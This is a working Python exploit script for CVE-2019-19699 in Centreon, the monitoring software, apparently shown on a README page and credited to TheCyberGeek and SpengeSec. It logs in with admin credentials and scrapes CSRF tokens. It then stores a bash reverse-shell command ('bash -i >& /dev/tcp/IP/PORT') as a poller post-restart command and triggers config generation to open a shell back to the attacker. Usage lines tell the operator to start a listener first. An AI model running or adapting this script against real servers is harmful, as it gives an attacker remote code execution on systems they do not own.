README.md
Rendering markdown...
import requests
import re
import sys
import urllib.parse
import _thread
if len(sys.argv) < 6:
print("Script by TheCyberGeek")
print("Discovered by SpengeSec & TheCyberGeek")
print("Start Listener before starting this exploit!")
print("")
print("Usage:\tpython3 CVE-2019-19699.py URL USER PASS IP PORT")
print("Ex:\tpython3 CVE-2019-19699.py http://10.0.0.2/centreon admin centreon 10.0.0.1 4444")
sys.exit(0)
else:
base_path, username, password, ip, port = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5]
print("Script by TheCyberGeek")
print("Discovered by SpengeSec & TheCyberGeek")
print("Start Listener before starting this exploit!")
s = requests.Session()
f = s.get(base_path + "/index.php")
token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
f = s.post(base_path + "/index.php", data={"useralias": username, "password": password, "centreon_token": token, "submitLogin": "Connect"})
if "You need to enable JavaScript to run this app" in f.text:
print("Logged in!")
f = s.get(base_path + "/main.get.php?p=60803&o=a&type=3")
token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
if token:
f = s.post(base_path + "/main.get.php?p=60803&type=3", data={"command_name": "shell", "command_type[command_type]": "3", "command_line": "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1".format(ip,port), "resource": "$CENTREONPLUGINS$", "plugins": "/Centreon/SNMP", "macros": "$ADMINEMAIL$", "command_example": "", "listOfArg": "", "listOfMacros": "", "connectors": "", "graph_id": "", "command_activate[command_activate]": "1", "command_comment": "", "submitA": "Save", "command_id": "", "type": "3", "o": "a", "centreon_token": token})
if "shell" in f.text:
print("Great. Post-restart command has been saved!")
s.get(base_path + "/main.get.php?p=60901&o=c&server_id=1")
token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
if token:
# You may need to change pollercmd[0] to your sessions ID.
f = s.post(base_path + "/main.get.php?p=60901", data={"name": "Central", "ns_ip_address": "127.0.0.1", "localhost[localhost]": "1", "is_default[is_default]": "1", "ssh_port": "22", "engine_start_command": "service centengine start", "engine_stop_command": "service centengine stop","engine_restart_command": "service centengine restart", "engine_reload_command": "service centengine reload", "nagios_bin": "/usr/sbin/centengine","nagiostats_bin": "/usr/sbin/centenginestats","nagios_perfdata": "/var/log/centreon-engine/service-perfdata", "broker_reload_command": "service cbd reload", "centreonbroker_cfg_path": "/etc/centreon-broker", "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker", "centreonbroker_logs_path": "", "centreonconnector_path": "/usr/lib64/centreon-connector", "init_script_centreontrapd": "centreontrapd", "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/", "pollercmd[0]":"188", "clone_order_pollercmd_0": "","ns_activate[ns_activate]": "1", "submitC": "Save", "id": "1", "o": "c", "centreon_token": token})
print("Saved the post-restart command in poller configuration!")
s.get(base_path + "/main.php?p=60902&poller=1")
token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
if token:
try:
print("[ + ] Shell received. Check your listener!")
f = s.post(base_path + """/include/configuration/configGenerate/xml/postcommand.php""", data={"poller": "1"}, timeout=0.0000000001)
except requests.exceptions.ReadTimeout:
pass
else:
print("Couldn't get token for poller export page...")
else:
print("Could not find token for poller configuration page...")
else:
print("Failed to upload command...")
else:
print("Failed to grab token for command execution page...")
else:
print("Cannot login to Centreon...")